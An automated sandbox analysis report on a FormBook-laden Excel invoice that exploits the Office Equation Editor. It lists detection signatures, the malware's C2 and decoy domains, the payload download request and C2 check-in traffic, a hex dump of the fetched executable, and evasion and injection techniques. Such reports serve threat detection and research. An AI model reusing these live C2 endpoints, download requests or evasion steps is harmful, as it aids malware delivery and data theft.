Windows Analysis Report PROFORMA INVOICE.xlsx

Overview

General Information

Sample Name: PROFORMA INVOICE.xlsx
Analysis ID: 528789
MD5: f0e46aba95165b11ad7fc84d80a73730
SHA1: 2ea511219e2c3d76597483c4998a2af40d821142
SHA256: 009dfe9d9409704671b802ddaa54ee22355f3ff41c6ef779b7e644c76466e0b0
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Suspicius Add Task From User AppData Temp
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Drops PE files to the user directory
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://www.deboraverdian.com/ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
Multi AV Scanner detection for submitted file
Source: PROFORMA INVOICE.xlsx ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 9.0.vbc.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.462674322.0000000000910000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.461677984.00000000007B0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.495648156.0000000000DC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000003.495116287.00000000002A0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.495983916.00000000004E0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.661157510.0000000000BA0000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb source: vbc.exe, 00000009.00000002.495309971.00000000006D9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.495142826.0000000000030000.00000040.00020000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.229.133:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.noyoucantridemyonewheel.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 9_2_00406ABE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop ebx 12_2_00086ABE
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.229.133:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.digipoint-entertainment.com
Source: C:\Windows\explorer.exe Domain query: www.hacticum.com
Source: C:\Windows\explorer.exe Network Connect: 108.167.189.66 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.trashwasher.com
Source: C:\Windows\explorer.exe Domain query: www.noyoucantridemyonewheel.com
Source: C:\Windows\explorer.exe Domain query: www.franquiciasexclusivas.tienda
Source: C:\Windows\explorer.exe Network Connect: 151.106.119.46 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.deboraverdian.com
Source: C:\Windows\explorer.exe Network Connect: 151.101.66.159 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.septemberstockevent200.com/ht08/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.noyoucantridemyonewheel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.deboraverdian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.franquiciasexclusivas.tiendaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.hacticum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.trashwasher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:26:21 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 25 Nov 2021 07:58:32 GMTETag: "6c800-5d19857437223"Accept-Ranges: bytesContent-Length: 444416Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 42 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 be 06 00 00 08 00 00 00 00 00 00 36 dc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 db 06 00 4f 00 00 00 00 e0 06 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c bc 06 00 00 20 00 00 00 be 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 e0 06 00 00 06 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 07 00 00 02 00 00 00 c6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 dc 06 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 14 76 00 00 03 00 00 00 93 00 00 06 bc db 00 00 28 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /90009/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.229.133Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.25 192.0.78.25
Source: Joe Sandbox View IP Address: 151.101.66.159 151.101.66.159
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: schtasks.exe, 00000007.00000002.457769626.0000000000830000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.476194780.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.661607475.00000000042B0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.485622386.0000000006A09000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484209612.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476939391.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506224485.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A725389E.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.noyoucantridemyonewheel.com
Source: global traffic HTTP traffic detected: GET /90009/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.229.133Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.noyoucantridemyonewheel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.deboraverdian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.franquiciasexclusivas.tiendaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.hacticum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1Host: www.trashwasher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 18:27:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
